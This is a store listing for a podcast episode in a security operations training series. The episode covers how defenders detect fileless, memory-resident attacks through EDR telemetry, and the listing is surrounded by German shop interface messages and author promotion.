Episode 8 — The Process That Hid in Memory | Security Operations: EDR Detection & Fileless Attacks

Artikel konnten nicht hinzugefügt werden

Leider können wir den Artikel nicht hinzufügen, da Ihr Warenkorb bereits seine Kapazität erreicht hat.

Der Titel konnte nicht zum Warenkorb hinzugefügt werden.

Bitte versuchen Sie es später noch einmal

Der Titel konnte nicht zum Merkzettel hinzugefügt werden.

Bitte versuchen Sie es später noch einmal

„Von Wunschzettel entfernen“ fehlgeschlagen.

Bitte versuchen Sie es später noch einmal

„Podcast folgen“ fehlgeschlagen

„Podcast nicht mehr folgen“ fehlgeschlagen

Episode 8 — The Process That Hid in Memory | Security Operations: EDR Detection & Fileless Attacks

Jetzt kostenlos hören, ohne Abo

Details anzeigen

Nur 0,99 € pro Monat für die ersten 3 Monate

Danach 9.95 € pro Monat. Bedingungen gelten.

Über diesen Titel

EPISODE 8 — THE PROCESS THAT HID IN MEMORY Security+ Domain 4 concepts • CySA+ behavioral analytics • SOC fileless attack detection

Modern attackers don’t always drop files. Sometimes the entire attack happens in memory — invisible to antivirus, bypassing traditional scans, and relying on stealth to stay ahead of the SOC.

In this cinematic scenario, you’ll see how defenders detect fileless techniques through subtle signals: unusual PowerShell behavior, reflective loading, credential access attempts, and processes that should never run the way they’re running.

What you’ll learn:

• How fileless attacks operate without touching disk • Why memory-only processes are early indicators of compromise • How EDR/XDR telemetry exposes reflective loading & AMSI bypass attempts • How attackers attempt credential access through LSASS • What suspicious PowerShell behavior looks like • How to isolate, contain, and escalate memory-resident threats

Security Operations Skills Covered:

✔ EDR/XDR telemetry interpretation

✔ Memory analysis fundamentals

✔ Fileless malware techniques

✔ Behavioral & heuristic detection

✔ Credential theft monitoring

✔ Threat hunting signals

✔ Incident response workflow for in-memory attacks

This scenario reinforces key concepts from:

Security+ (SY0-701) — EDR/XDR, behavioral detection, malware identification, IR workflows

CySA+ (CS0-003) — Memory-based attacks, credential access attempts, advanced detection analytics

Designed to support both exam learners and working SOC analysts.

Ideal for:

— Security+ learners — CySA+ learners — SOC Tier 1 analysts — Blue team defenders — Incident responders — Anyone learning how modern attackers avoid traditional AV

Short. Cinematic. Practical. A real-world look into attacks designed to stay invisible.

New episodes weekly.

Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.

Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/

CyberLex Learning — Forge the Defender.

Noch keine Rezensionen vorhanden